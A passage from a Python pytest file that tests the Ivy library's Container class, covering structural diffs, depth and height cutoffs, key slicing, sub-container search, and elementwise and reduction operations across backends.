container_diff = ivy.Container.structural_diff(container_0, container_1)
assert np.equal(ivy.to_numpy(container_diff.a), np.array([1]))
assert np.equal(ivy.to_numpy(container_diff.b.c.diff_0), np.array([2]))
assert np.equal(ivy.to_numpy(container_diff.b.c.diff_1), np.array([5]))
assert np.equal(ivy.to_numpy(container_diff.b.d), np.array([3]))
container_diff_diff_only = ivy.Container.structural_diff(
container_0, container_1, mode="diff_only"
)
assert "a" not in container_diff_diff_only
assert "b" in container_diff_diff_only
assert "c" in container_diff_diff_only["b"]
assert "d" not in container_diff_diff_only["b"]
container_diff_same_only = ivy.Container.structural_diff(
container_0, container_1, mode="same_only"
)
assert "a" in container_diff_same_only
assert "b" in container_diff_same_only
assert "c" not in container_diff_same_only["b"]
assert "d" in container_diff_same_only["b"]
# all different keys
container_0 = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container_1 = Container(
{
"e": ivy.array([4], device=device),
"f": {
"g": ivy.array([5], device=device),
"h": ivy.array([6], device=device),
},
}
)
container_diff = ivy.Container.structural_diff(container_0, container_1)
assert np.equal(ivy.to_numpy(container_diff.a.diff_0), np.array([1]))
assert np.equal(ivy.to_numpy(container_diff.b.diff_0.c), np.array([2]))
assert np.equal(ivy.to_numpy(container_diff.b.diff_0.d), np.array([3]))
assert np.equal(ivy.to_numpy(container_diff.e.diff_1), np.array([4]))
assert np.equal(ivy.to_numpy(container_diff.f.diff_1.g), np.array([5]))
assert np.equal(ivy.to_numpy(container_diff.f.diff_1.h), np.array([6]))
container_diff_diff_only = ivy.Container.structural_diff(
container_0, container_1, mode="diff_only"
)
assert container_diff_diff_only.to_dict() == container_diff.to_dict()
container_diff_same_only = ivy.Container.structural_diff(
container_0, container_1, mode="same_only"
)
assert container_diff_same_only.to_dict() == {}
# some different keys
container_0 = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container_1 = Container(
{
"a": ivy.array([4], device=device),
"b": {
"c": ivy.array([5], device=device),
"e": ivy.array([6], device=device),
},
}
)
container_diff = ivy.Container.structural_diff(container_0, container_1)
assert np.equal(ivy.to_numpy(container_diff.a), np.array([1]))
assert np.equal(ivy.to_numpy(container_diff.b.c), np.array([2]))
assert np.equal(ivy.to_numpy(container_diff.b.d.diff_0), np.array([3]))
assert np.equal(ivy.to_numpy(container_diff.b.e.diff_1), np.array([6]))
container_diff_diff_only = ivy.Container.structural_diff(
container_0, container_1, mode="diff_only"
)
assert "a" not in container_diff_diff_only
assert "b" in container_diff_diff_only
assert "c" not in container_diff_diff_only["b"]
assert "d" in container_diff_diff_only["b"]
assert "e" in container_diff_diff_only["b"]
container_diff_same_only = ivy.Container.structural_diff(
container_0, container_1, mode="same_only"
)
assert "a" in container_diff_same_only
assert "b" in container_diff_same_only
assert "c" in container_diff_same_only["b"]
assert "d" not in container_diff_same_only["b"]
assert "e" not in container_diff_same_only["b"]
# all same
container_0 = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container_1 = Container(
{
"a": ivy.array([4], device=device),
"b": {
"c": ivy.array([5], device=device),
"d": ivy.array([6], device=device),
},
}
)
container_diff = ivy.Container.structural_diff(container_0, container_1)
assert np.equal(ivy.to_numpy(container_diff.a), np.array([1]))
assert np.equal(ivy.to_numpy(container_diff.b.c), np.array([2]))
assert np.equal(ivy.to_numpy(container_diff.b.d), np.array([3]))
container_diff_diff_only = ivy.Container.structural_diff(
container_0, container_1, mode="diff_only"
)
assert container_diff_diff_only.to_dict() == {}
container_diff_same_only = ivy.Container.structural_diff(
container_0, container_1, mode="same_only"
)
assert container_diff_same_only.to_dict() == container_diff.to_dict()
def test_container_from_dict(device, call):
dict_in = {
"a": ivy.array([1], device=device),
"b": {"c": ivy.array([2], device=device), "d": ivy.array([3], device=device)},
}
container = Container(dict_in)
assert np.allclose(ivy.to_numpy(container["a"]), np.array([1]))
assert np.allclose(ivy.to_numpy(container.a), np.array([1]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([2]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([2]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([3]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([3]))
def test_container_depth(device, call):
cont_depth1 = Container(
{"a": ivy.array([1], device=device), "b": ivy.array([2], device=device)}
)
assert cont_depth1.max_depth == 1
cont_depth2 = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
assert cont_depth2.max_depth == 2
cont_depth3 = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": {"d": ivy.array([2], device=device)},
"e": ivy.array([3], device=device),
},
}
)
assert cont_depth3.max_depth == 3
cont_depth4 = Container(
{
"a": ivy.array([1], device=device),
"b": {"c": {"d": {"e": ivy.array([2], device=device)}}},
}
)
assert cont_depth4.max_depth == 4
@pytest.mark.parametrize("inplace", [True, False])
def test_container_cutoff_at_depth(inplace, device, call):
# values
a_val = ivy.array([1], device=device)
bcde_val = ivy.array([2], device=device)
# depth 1
cont = Container({"a": a_val, "b": {"c": {"d": {"e": bcde_val}}}})
cont_cutoff = cont.cutoff_at_depth(1, inplace=inplace)
if inplace:
cont_cutoff = cont
assert np.allclose(ivy.to_numpy(cont_cutoff.a), ivy.to_numpy(a_val))
assert not cont_cutoff.b
# depth 2
cont = Container({"a": a_val, "b": {"c": {"d": {"e": bcde_val}}}})
cont_cutoff = cont.cutoff_at_depth(2, inplace=inplace)
if inplace:
cont_cutoff = cont
assert np.allclose(ivy.to_numpy(cont_cutoff.a), ivy.to_numpy(a_val))
assert not cont_cutoff.b.c
# depth 3
cont = Container({"a": a_val, "b": {"c": {"d": {"e": bcde_val}}}})
cont_cutoff = cont.cutoff_at_depth(3, inplace=inplace)
if inplace:
cont_cutoff = cont
assert np.allclose(ivy.to_numpy(cont_cutoff.a), ivy.to_numpy(a_val))
assert not cont_cutoff.b.c.d
# depth 4
cont = Container({"a": a_val, "b": {"c": {"d": {"e": bcde_val}}}})
cont_cutoff = cont.cutoff_at_depth(4, inplace=inplace)
if inplace:
cont_cutoff = cont
assert np.allclose(ivy.to_numpy(cont_cutoff.a), ivy.to_numpy(a_val))
assert np.allclose(ivy.to_numpy(cont_cutoff.b.c.d.e), ivy.to_numpy(bcde_val))
@pytest.mark.parametrize("inplace", [True, False])
def test_container_cutoff_at_height(inplace, device, call):
# values
d_val = ivy.array([2], device=device)
e_val = ivy.array([3], device=device)
# height 0
cont = Container({"a": {"c": {"d": d_val}}, "b": {"c": {"d": {"e": e_val}}}})
cont_cutoff = cont.cutoff_at_height(0, inplace=inplace)
if inplace:
cont_cutoff = cont
assert np.allclose(ivy.to_numpy(cont_cutoff.a.c.d), ivy.to_numpy(d_val))
assert np.allclose(ivy.to_numpy(cont_cutoff.b.c.d.e), ivy.to_numpy(e_val))
# height 1
cont = Container({"a": {"c": {"d": d_val}}, "b": {"c": {"d": {"e": e_val}}}})
cont_cutoff = cont.cutoff_at_height(1, inplace=inplace)
if inplace:
cont_cutoff = cont
assert not cont_cutoff.a.c
assert not cont_cutoff.b.c.d
# height 2
cont = Container({"a": {"c": {"d": d_val}}, "b": {"c": {"d": {"e": e_val}}}})
cont_cutoff = cont.cutoff_at_height(2, inplace=inplace)
if inplace:
cont_cutoff = cont
assert not cont_cutoff.a
assert not cont_cutoff.b.c
# height 3
cont = Container({"a": {"c": {"d": d_val}}, "b": {"c": {"d": {"e": e_val}}}})
cont_cutoff = cont.cutoff_at_height(3, inplace=inplace)
if inplace:
cont_cutoff = cont
assert not cont_cutoff.a
assert not cont_cutoff.b
# height 4
cont = Container({"a": {"c": {"d": d_val}}, "b": {"c": {"d": {"e": e_val}}}})
cont_cutoff = cont.cutoff_at_height(4, inplace=inplace)
if inplace:
cont_cutoff = cont
assert not cont_cutoff
@pytest.mark.parametrize("str_slice", [True, False])
def test_container_slice_keys(str_slice, device, call):
# values
a_val = ivy.array([1], device=device)
b_val = ivy.array([2], device=device)
c_val = ivy.array([3], device=device)
d_val = ivy.array([4], device=device)
e_val = ivy.array([5], device=device)
# slice
if str_slice:
slc = "b:d"
else:
slc = slice(1, 4, 1)
# without dict
cont = Container({"a": a_val, "b": b_val, "c": c_val, "d": d_val, "e": e_val})
cont_sliced = cont.slice_keys(slc)
assert "a" not in cont_sliced
assert np.allclose(ivy.to_numpy(cont_sliced.b), ivy.to_numpy(b_val))
assert np.allclose(ivy.to_numpy(cont_sliced.c), ivy.to_numpy(c_val))
assert np.allclose(ivy.to_numpy(cont_sliced.d), ivy.to_numpy(d_val))
assert "e" not in cont_sliced
# with dict, depth 0
sub_cont = Container({"a": a_val, "b": b_val, "c": c_val, "d": d_val, "e": e_val})
cont = Container(
{"a": sub_cont, "b": sub_cont, "c": sub_cont, "d": sub_cont, "e": sub_cont}
)
cont_sliced = cont.slice_keys({0: slc})
assert "a" not in cont_sliced
assert Container.identical([cont_sliced.b, sub_cont])
assert Container.identical([cont_sliced.c, sub_cont])
assert Container.identical([cont_sliced.d, sub_cont])
assert "e" not in cont_sliced
# with dict, depth 1
sub_cont = Container({"a": a_val, "b": b_val, "c": c_val, "d": d_val, "e": e_val})
sub_sub_cont = Container({"b": b_val, "c": c_val, "d": d_val})
cont = Container(
{"a": sub_cont, "b": sub_cont, "c": sub_cont, "d": sub_cont, "e": sub_cont}
)
cont_sliced = cont.slice_keys({1: slc})
assert Container.identical([cont_sliced.a, sub_sub_cont])
assert Container.identical([cont_sliced.b, sub_sub_cont])
assert Container.identical([cont_sliced.c, sub_sub_cont])
assert Container.identical([cont_sliced.d, sub_sub_cont])
assert Container.identical([cont_sliced.e, sub_sub_cont])
# with dict, depth 0, 1
sub_cont = Container({"a": a_val, "b": b_val, "c": c_val, "d": d_val, "e": e_val})
sub_sub_cont = Container({"b": b_val, "c": c_val, "d": d_val})
cont = Container(
{"a": sub_cont, "b": sub_cont, "c": sub_cont, "d": sub_cont, "e": sub_cont}
)
cont_sliced = cont.slice_keys({0: slc, 1: slc})
assert "a" not in cont_sliced
assert Container.identical([cont_sliced.b, sub_sub_cont])
assert Container.identical([cont_sliced.c, sub_sub_cont])
assert Container.identical([cont_sliced.d, sub_sub_cont])
assert "e" not in cont_sliced
# all depths
sub_cont = Container({"a": a_val, "b": b_val, "c": c_val, "d": d_val, "e": e_val})
sub_sub_cont = Container({"b": b_val, "c": c_val, "d": d_val})
cont = Container(
{"a": sub_cont, "b": sub_cont, "c": sub_cont, "d": sub_cont, "e": sub_cont}
)
cont_sliced = cont.slice_keys(slc, all_depths=True)
assert "a" not in cont_sliced
assert Container.identical([cont_sliced.b, sub_sub_cont])
assert Container.identical([cont_sliced.c, sub_sub_cont])
assert Container.identical([cont_sliced.d, sub_sub_cont])
assert "e" not in cont_sliced
def test_container_show(device, call):
if call is helpers.mx_call:
# ToDo: get this working for mxnet again, recent version update caused errors.
pytest.skip()
dict_in = {
"a": ivy.array([1], device=device),
"b": {"c": ivy.array([2], device=device), "d": ivy.array([3], device=device)},
}
cont = Container(dict_in)
print(cont)
cont.show()
def test_container_find_sub_container(device, call):
arr1 = ivy.array([1], device=device)
arr2 = ivy.array([2], device=device)
arr3 = ivy.array([3], device=device)
dict_in = {"a": arr1, "b": {"c": arr2, "d": arr3}}
top_cont = Container(dict_in)
# full
sub_cont = Container(dict_in["b"])
assert sub_cont in top_cont
found_kc = top_cont.find_sub_container(sub_cont)
assert found_kc == "b"
found_kc = top_cont.find_sub_container(top_cont)
assert found_kc == ""
# partial
partial_sub_cont = Container({"d": arr3})
found_kc = top_cont.find_sub_container(partial_sub_cont, partial=True)
assert found_kc == "b"
assert partial_sub_cont.find_sub_container(top_cont, partial=True) is False
partial_sub_cont = Container({"b": {"d": arr3}})
found_kc = top_cont.find_sub_container(partial_sub_cont, partial=True)
assert found_kc == ""
assert partial_sub_cont.find_sub_container(top_cont, partial=True) is False
def test_container_find_sub_structure(device, call):
dict_in = {
"a": ivy.array([1], device=device),
"b": {"c": ivy.array([2], device=device), "d": ivy.array([3], device=device)},
}
top_cont = Container(dict_in)
# full
sub_cont = Container(
{"c": ivy.array([4], device=device), "d": ivy.array([5], device=device)}
)
assert not top_cont.find_sub_container(sub_cont)
found_kc = top_cont.find_sub_structure(sub_cont)
assert found_kc == "b"
found_kc = top_cont.find_sub_structure(top_cont)
assert found_kc == ""
# partial
partial_sub_cont = Container({"d": ivy.array([5], device=device)})
found_kc = top_cont.find_sub_structure(partial_sub_cont, partial=True)
assert found_kc == "b"
partial_sub_cont = Container({"b": {"d": ivy.array([5], device=device)}})
found_kc = top_cont.find_sub_structure(partial_sub_cont, partial=True)
assert found_kc == ""
def test_container_show_sub_container(device, call):
if call is helpers.mx_call:
# ToDo: get this working for mxnet again, recent version update caused errors.
pytest.skip()
dict_in = {
"a": ivy.array([1], device=device),
"b": {"c": ivy.array([2], device=device), "d": ivy.array([3], device=device)},
}
top_cont = Container(dict_in)
sub_cont = Container(dict_in["b"])
top_cont.show_sub_container("b")
top_cont.show_sub_container(sub_cont)
def test_container_from_dict_w_cont_types(device, call):
# ToDo: add tests for backends other than jax
if call is not helpers.jnp_call:
pytest.skip()
from haiku._src.data_structures import FlatMapping
dict_in = {
"a": ivy.array([1], device=device),
"b": FlatMapping(
{"c": ivy.array([2], device=device), "d": ivy.array([3], device=device)}
),
}
container = Container(dict_in)
assert np.allclose(ivy.to_numpy(container["a"]), np.array([1]))
assert np.allclose(ivy.to_numpy(container.a), np.array([1]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([2]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([2]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([3]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([3]))
def test_container_from_kwargs(device, call):
container = Container(
a=ivy.array([1], device=device),
b={"c": ivy.array([2], device=device), "d": ivy.array([3], device=device)},
)
assert np.allclose(ivy.to_numpy(container["a"]), np.array([1]))
assert np.allclose(ivy.to_numpy(container.a), np.array([1]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([2]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([2]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([3]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([3]))
def test_container_from_list(device, call):
list_in = [
ivy.array([1], device=device),
[ivy.array([2], device=device), ivy.array([3], device=device)],
]
container = Container(list_in, types_to_iteratively_nest=[list])
assert np.allclose(ivy.to_numpy(container["it_0"]), np.array([1]))
assert np.allclose(ivy.to_numpy(container.it_0), np.array([1]))
assert np.allclose(ivy.to_numpy(container["it_1"]["it_0"]), np.array([2]))
assert np.allclose(ivy.to_numpy(container.it_1.it_0), np.array([2]))
assert np.allclose(ivy.to_numpy(container["it_1"]["it_1"]), np.array([3]))
assert np.allclose(ivy.to_numpy(container.it_1.it_1), np.array([3]))
def test_container_from_tuple(device, call):
tuple_in = (
ivy.array([1], device=device),
(ivy.array([2], device=device), ivy.array([3], device=device)),
)
container = Container(tuple_in, types_to_iteratively_nest=[tuple])
assert np.allclose(ivy.to_numpy(container["it_0"]), np.array([1]))
assert np.allclose(ivy.to_numpy(container.it_0), np.array([1]))
assert np.allclose(ivy.to_numpy(container["it_1"]["it_0"]), np.array([2]))
assert np.allclose(ivy.to_numpy(container.it_1.it_0), np.array([2]))
assert np.allclose(ivy.to_numpy(container["it_1"]["it_1"]), np.array([3]))
assert np.allclose(ivy.to_numpy(container.it_1.it_1), np.array([3]))
def test_container_to_raw(device, call):
tuple_in = (
ivy.array([1], device=device),
(ivy.array([2], device=device), ivy.array([3], device=device)),
)
container = Container(tuple_in, types_to_iteratively_nest=[tuple])
raw = container.to_raw()
assert np.allclose(ivy.to_numpy(raw[0]), np.array([1]))
assert np.allclose(ivy.to_numpy(raw[1][0]), np.array([2]))
assert np.allclose(ivy.to_numpy(raw[1][1]), np.array([3]))
def test_container_sum(device, call):
dict_in = {
"a": ivy.array([1.0, 2.0, 3.0], device=device),
"b": {
"c": ivy.array([2.0, 4.0, 6.0], device=device),
"d": ivy.array([3.0, 6.0, 9.0], device=device),
},
}
container = Container(dict_in)
container_sum = container.sum()
assert np.allclose(ivy.to_numpy(container_sum["a"]), np.array([6.0]))
assert np.allclose(ivy.to_numpy(container_sum.a), np.array([6.0]))
assert np.allclose(ivy.to_numpy(container_sum["b"]["c"]), np.array([12.0]))
assert np.allclose(ivy.to_numpy(container_sum.b.c), np.array([12.0]))
assert np.allclose(ivy.to_numpy(container_sum["b"]["d"]), np.array([18.0]))
assert np.allclose(ivy.to_numpy(container_sum.b.d), np.array([18.0]))
def test_container_prod(device, call):
dict_in = {
"a": ivy.array([1.0, 2.0, 3.0], device=device),
"b": {
"c": ivy.array([2.0, 4.0, 6.0], device=device),
"d": ivy.array([3.0, 6.0, 9.0], device=device),
},
}
container = Container(dict_in)
container_prod = container.prod()
assert np.allclose(ivy.to_numpy(container_prod["a"]), np.array([6.0]))
assert np.allclose(ivy.to_numpy(container_prod.a), np.array([6.0]))
assert np.allclose(ivy.to_numpy(container_prod["b"]["c"]), np.array([48.0]))
assert np.allclose(ivy.to_numpy(container_prod.b.c), np.array([48.0]))
assert np.allclose(ivy.to_numpy(container_prod["b"]["d"]), np.array([162.0]))
assert np.allclose(ivy.to_numpy(container_prod.b.d), np.array([162.0]))
def test_container_mean(device, call):
dict_in = {
"a": ivy.array([1.0, 2.0, 3.0], device=device),
"b": {
"c": ivy.array([2.0, 4.0, 6.0], device=device),
"d": ivy.array([3.0, 6.0, 9.0], device=device),
},
}
container = Container(dict_in)
container_mean = container.mean()
assert np.allclose(ivy.to_numpy(container_mean["a"]), np.array([2.0]))
assert np.allclose(ivy.to_numpy(container_mean.a), np.array([2.0]))
assert np.allclose(ivy.to_numpy(container_mean["b"]["c"]), np.array([4.0]))
assert np.allclose(ivy.to_numpy(container_mean.b.c), np.array([4.0]))
assert np.allclose(ivy.to_numpy(container_mean["b"]["d"]), np.array([6.0]))
assert np.allclose(ivy.to_numpy(container_mean.b.d), np.array([6.0]))
def test_container_var(device, call):
dict_in = {
"a": ivy.array([1.0, 2.0, 3.0], device=device),
"b": {
"c": ivy.array([2.0, 4.0, 6.0], device=device),
"d": ivy.array([3.0, 6.0, 9.0], device=device),
},
}
container = Container(dict_in)
container_var = container.var()
assert np.allclose(ivy.to_numpy(container_var["a"]), np.array([2 / 3]))
assert np.allclose(ivy.to_numpy(container_var.a), np.array([2 / 3]))
assert np.allclose(ivy.to_numpy(container_var["b"]["c"]), np.array([8 / 3]))
assert np.allclose(ivy.to_numpy(container_var.b.c), np.array([8 / 3]))
assert np.allclose(ivy.to_numpy(container_var["b"]["d"]), np.array([6.0]))
assert np.allclose(ivy.to_numpy(container_var.b.d), np.array([6.0]))
def test_container_std(device, call):
dict_in = {
"a": ivy.array([1.0, 2.0, 3.0], device=device),
"b": {
"c": ivy.array([2.0, 4.0, 6.0], device=device),
"d": ivy.array([3.0, 6.0, 9.0], device=device),
},
}
container = Container(dict_in)
container_std = container.std()
assert np.allclose(ivy.to_numpy(container_std["a"]), np.array([2 / 3]) ** 0.5)
assert np.allclose(ivy.to_numpy(container_std.a), np.array([2 / 3]) ** 0.5)
assert np.allclose(ivy.to_numpy(container_std["b"]["c"]), np.array([8 / 3]) ** 0.5)
assert np.allclose(ivy.to_numpy(container_std.b.c), np.array([8 / 3]) ** 0.5)
assert np.allclose(ivy.to_numpy(container_std["b"]["d"]), np.array([6.0]) ** 0.5)
assert np.allclose(ivy.to_numpy(container_std.b.d), np.array([6.0]) ** 0.5)
def test_container_minimum(device, call):
container = Container(
{
"a": ivy.array([1.0, 2.0, 3.0], device=device),
"b": {
"c": ivy.array([2.0, 4.0, 6.0], device=device),
"d": ivy.array([3.0, 6.0, 9.0], device=device),
},
}
)
other = Container(
{
"a": ivy.array([2.0, 3.0, 2.0], device=device),
"b": {
"c": ivy.array([1.0, 5.0, 4.0], device=device),
"d": ivy.array([4.0, 7.0, 8.0], device=device),
},
}
)
# against number
container_minimum = container.minimum(5.0)
assert np.allclose(ivy.to_numpy(container_minimum["a"]), np.array([1.0, 2.0, 3.0]))
assert np.allclose(ivy.to_numpy(container_minimum.a), np.array([1.0, 2.0, 3.0]))
assert np.allclose(
ivy.to_numpy(container_minimum["b"]["c"]), np.array([2.0, 4.0, 5.0])
)
assert np.allclose(ivy.to_numpy(container_minimum.b.c), np.array([2.0, 4.0, 5.0]))
assert np.allclose(
ivy.to_numpy(container_minimum["b"]["d"]), np.array([3.0, 5.0, 5.0])
)
assert np.allclose(ivy.to_numpy(container_minimum.b.d), np.array([3.0, 5.0, 5.0]))
# against container
container_minimum = container.minimum(other)
assert np.allclose(ivy.to_numpy(container_minimum["a"]), np.array([1.0, 2.0, 2.0]))
assert np.allclose(ivy.to_numpy(container_minimum.a), np.array([1.0, 2.0, 2.0]))
assert np.allclose(
ivy.to_numpy(container_minimum["b"]["c"]), np.array([1.0, 4.0, 4.0])
)
assert np.allclose(ivy.to_numpy(container_minimum.b.c), np.array([1.0, 4.0, 4.0]))
assert np.allclose(
ivy.to_numpy(container_minimum["b"]["d"]), np.array([3.0, 6.0, 8.0])
)
assert np.allclose(ivy.to_numpy(container_minimum.b.d), np.array([3.0, 6.0, 8.0]))
def test_container_maximum(device, call):
container = Container(
{
"a": ivy.array([1.0, 2.0, 3.0], device=device),
"b": {
"c": ivy.array([2.0, 4.0, 6.0], device=device),
"d": ivy.array([3.0, 6.0, 9.0], device=device),
},
}
)
other = Container(
{
"a": ivy.array([2.0, 3.0, 2.0], device=device),
"b": {
"c": ivy.array([1.0, 5.0, 4.0], device=device),
"d": ivy.array([4.0, 7.0, 8.0], device=device),
},
}
)
# against number
container_maximum = container.maximum(4.0)
assert np.allclose(ivy.to_numpy(container_maximum["a"]), np.array([4.0, 4.0, 4.0]))
assert np.allclose(ivy.to_numpy(container_maximum.a), np.array([4.0, 4.0, 4.0]))
assert np.allclose(
ivy.to_numpy(container_maximum["b"]["c"]), np.array([4.0, 4.0, 6.0])
)
assert np.allclose(ivy.to_numpy(container_maximum.b.c), np.array([4.0, 4.0, 6.0]))
assert np.allclose(
ivy.to_numpy(container_maximum["b"]["d"]), np.array([4.0, 6.0, 9.0])
)
assert np.allclose(ivy.to_numpy(container_maximum.b.d), np.array([4.0, 6.0, 9.0]))
# against container
container_maximum = container.maximum(other)
assert np.allclose(ivy.to_numpy(container_maximum["a"]), np.array([2.0, 3.0, 3.0]))
assert np.allclose(ivy.to_numpy(container_maximum.a), np.array([2.0, 3.0, 3.0]))
assert np.allclose(
ivy.to_numpy(container_maximum["b"]["c"]), np.array([2.0, 5.0, 6.0])
)
assert np.allclose(ivy.to_numpy(container_maximum.b.c), np.array([2.0, 5.0, 6.0]))
assert np.allclose(
ivy.to_numpy(container_maximum["b"]["d"]), np.array([4.0, 7.0, 9.0])
)
assert np.allclose(ivy.to_numpy(container_maximum.b.d), np.array([4.0, 7.0, 9.0]))
def test_container_clip(device, call):
container = Container(
{
"a": ivy.array([1.0, 2.0, 3.0], device=device),
"b": {
"c": ivy.array([2.0, 4.0, 6.0], device=device),
"d": ivy.array([3.0, 6.0, 9.0], device=device),
},
}
)
container_min = Container(
{
"a": ivy.array([2.0, 0.0, 0.0], device=device),
"b": {
"c": ivy.array([0.0, 5.0, 0.0], device=device),
"d": ivy.array([4.0, 7.0, 0.0], device=device),
},
}
)
container_max = Container(
{
"a": ivy.array([3.0, 1.0, 2.0], device=device),
"b": {
"c": ivy.array([1.0, 7.0, 5.0], device=device),
"d": ivy.array([5.0, 8.0, 8.0], device=device),
},
}
)
# against number
container_clipped = container.clip(2.0, 6.0)
assert np.allclose(ivy.to_numpy(container_clipped["a"]), np.array([2.0, 2.0, 3.0]))
assert np.allclose(ivy.to_numpy(container_clipped.a), np.array([2.0, 2.0, 3.0]))
assert np.allclose(
ivy.to_numpy(container_clipped["b"]["c"]), np.array([2.0, 4.0, 6.0])
)
assert np.allclose(ivy.to_numpy(container_clipped.b.c), np.array([2.0, 4.0, 6.0]))
assert np.allclose(
ivy.to_numpy(container_clipped["b"]["d"]), np.array([3.0, 6.0, 6.0])
)
assert np.allclose(ivy.to_numpy(container_clipped.b.d), np.array([3.0, 6.0, 6.0]))
if call is helpers.mx_call:
# MXNet clip does not support arrays for the min and max arguments
return
# against container
container_clipped = container.clip(container_min, container_max)
assert np.allclose(ivy.to_numpy(container_clipped["a"]), np.array([2.0, 1.0, 2.0]))
assert np.allclose(ivy.to_numpy(container_clipped.a), np.array([2.0, 1.0, 2.0]))
assert np.allclose(
ivy.to_numpy(container_clipped["b"]["c"]), np.array([1.0, 5.0, 5.0])
)
assert np.allclose(ivy.to_numpy(container_clipped.b.c), np.array([1.0, 5.0, 5.0]))
assert np.allclose(
ivy.to_numpy(container_clipped["b"]["d"]), np.array([4.0, 7.0, 8.0])
)
assert np.allclose(ivy.to_numpy(container_clipped.b.d), np.array([4.0, 7.0, 8.0]))
def test_container_clip_vector_norm(device, call):
container = Container({"a": ivy.array([[0.8, 2.2], [1.5, 0.2]], device=device)})
container_clipped = container.clip_vector_norm(2.5, 2.0)
assert np.allclose(
ivy.to_numpy(container_clipped["a"]),
np.array([[0.71749604, 1.9731141], [1.345305, 0.17937401]]),
)
assert np.allclose(
ivy.to_numpy(container_clipped.a),
np.array([[0.71749604, 1.9731141], [1.345305, 0.17937401]]),
)
def test_container_einsum(device, call):
dict_in = {
"a": ivy.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], device=device),
"b": {
"c": ivy.array([[2.0, 4.0], [6.0, 8.0], [10.0, 12.0]], device=device),
"d": ivy.array([[-2.0, -4.0], [-6.0, -8.0], [-10.0, -12.0]], device=device),
},
}
container = Container(dict_in)
container_einsummed = container.einsum("ij->i")
assert np.allclose(
ivy.to_numpy(container_einsummed["a"]), np.array([3.0, 7.0, 11.0])
)
assert np.allclose(ivy.to_numpy(container_einsummed.a), np.array([3.0, 7.0, 11.0]))
assert np.allclose(
ivy.to_numpy(container_einsummed["b"]["c"]), np.array([6.0, 14.0, 22.0])
)
assert np.allclose(
ivy.to_numpy(container_einsummed.b.c), np.array([6.0, 14.0, 22.0])
)
assert np.allclose(
ivy.to_numpy(container_einsummed["b"]["d"]), np.array([-6.0, -14.0, -22.0])
)
assert np.allclose(
ivy.to_numpy(container_einsummed.b.d), np.array([-6.0, -14.0, -22.0])
)
# def test_container_vector_norm(device, call):
# dict_in = {
# "a": ivy.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], device=device),
# "b": {
# "c": ivy.array([[2.0, 4.0], [6.0, 8.0], [10.0, 12.0]], device=device),
# "d": ivy.array([[3.0, 6.0], [9.0, 12.0], [15.0, 18.0]], device=device),
# },
# }
# container = Container(dict_in)
# container_normed = container.vector_norm(axis=(-1, -2))
# assert np.allclose(ivy.to_numpy(container_normed["a"]), 9.5394)
# assert np.allclose(ivy.to_numpy(container_normed.a), 9.5394)
# assert np.allclose(ivy.to_numpy(container_normed["b"]["c"]), 19.0788)
# assert np.allclose(ivy.to_numpy(container_normed.b.c), 19.0788)
# assert np.allclose(ivy.to_numpy(container_normed["b"]["d"]), 28.6182)
# assert np.allclose(ivy.to_numpy(container_normed.b.d), 28.6182)
def test_container_matrix_norm(device, call):
if call is helpers.mx_call:
# MXNet does not support matrix norm
pytest.skip()
dict_in = {
"a": ivy.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], device=device),
"b": {
"c": ivy.array([[2.0, 4.0], [6.0, 8.0], [10.0, 12.0]], device=device),
"d": ivy.array([[3.0, 6.0], [9.0, 12.0], [15.0, 18.0]], device=device),
},
}
container = Container(dict_in)
container_normed = container.matrix_norm()
assert np.allclose(ivy.to_numpy(container_normed["a"]), 9.52551809)
assert np.allclose(ivy.to_numpy(container_normed.a), 9.52551809)
assert np.allclose(ivy.to_numpy(container_normed["b"]["c"]), 19.05103618)
assert np.allclose(ivy.to_numpy(container_normed.b.c), 19.05103618)
assert np.allclose(ivy.to_numpy(container_normed["b"]["d"]), 28.57655427)
assert np.allclose(ivy.to_numpy(container_normed.b.d), 28.57655427)
def test_container_flip(device, call):
dict_in = {
"a": ivy.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], device=device),
"b": {
"c": ivy.array([[2.0, 4.0], [6.0, 8.0], [10.0, 12.0]], device=device),
"d": ivy.array([[-2.0, -4.0], [-6.0, -8.0], [-10.0, -12.0]], device=device),
},
}
container = Container(dict_in)
container_flipped = container.flip(-1)
assert np.allclose(
ivy.to_numpy(container_flipped["a"]),
np.array([[2.0, 1.0], [4.0, 3.0], [6.0, 5.0]]),
)
assert np.allclose(
ivy.to_numpy(container_flipped.a),
np.array([[2.0, 1.0], [4.0, 3.0], [6.0, 5.0]]),
)
assert np.allclose(
ivy.to_numpy(container_flipped["b"]["c"]),
np.array([[4.0, 2.0], [8.0, 6.0], [12.0, 10.0]]),
)
assert np.allclose(
ivy.to_numpy(container_flipped.b.c),
np.array([[4.0, 2.0], [8.0, 6.0], [12.0, 10.0]]),
)
assert np.allclose(
ivy.to_numpy(container_flipped["b"]["d"]),
np.array([[-4.0, -2.0], [-8.0, -6.0], [-12.0, -10.0]]),
)
assert np.allclose(
ivy.to_numpy(container_flipped.b.d),
np.array([[-4.0, -2.0], [-8.0, -6.0], [-12.0, -10.0]]),
)
def test_container_as_ones(device, call):
dict_in = {
"a": ivy.array([1], device=device),
"b": {"c": ivy.array([2], device=device), "d": ivy.array([3], device=device)},
}
